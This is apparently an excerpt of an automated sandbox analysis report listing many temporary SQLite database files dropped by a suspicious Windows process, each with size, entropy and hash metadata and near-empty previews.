                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mBGJNc9UPO

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mLBQ3DEClu

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mNOMwIz9r6

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\msjGthI2jy

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mwGIqlYIz3

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nD6AYsy2UX

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nE8AJOFfyQ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nQrKY8Tdqh

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nUwu4NAvzz

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nmg5NLyrZF

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\o3vwblfXlE

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\oDJgYeWmJB

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\oKORNkaA3t

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\oci8fvHEIp

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\olj8c3pv9t

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\oz0rvzAMwL

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\p63PXEtUfY

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\p6TPa701rJ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\pqiqHS7HNU

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\prpSOqgc4D

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
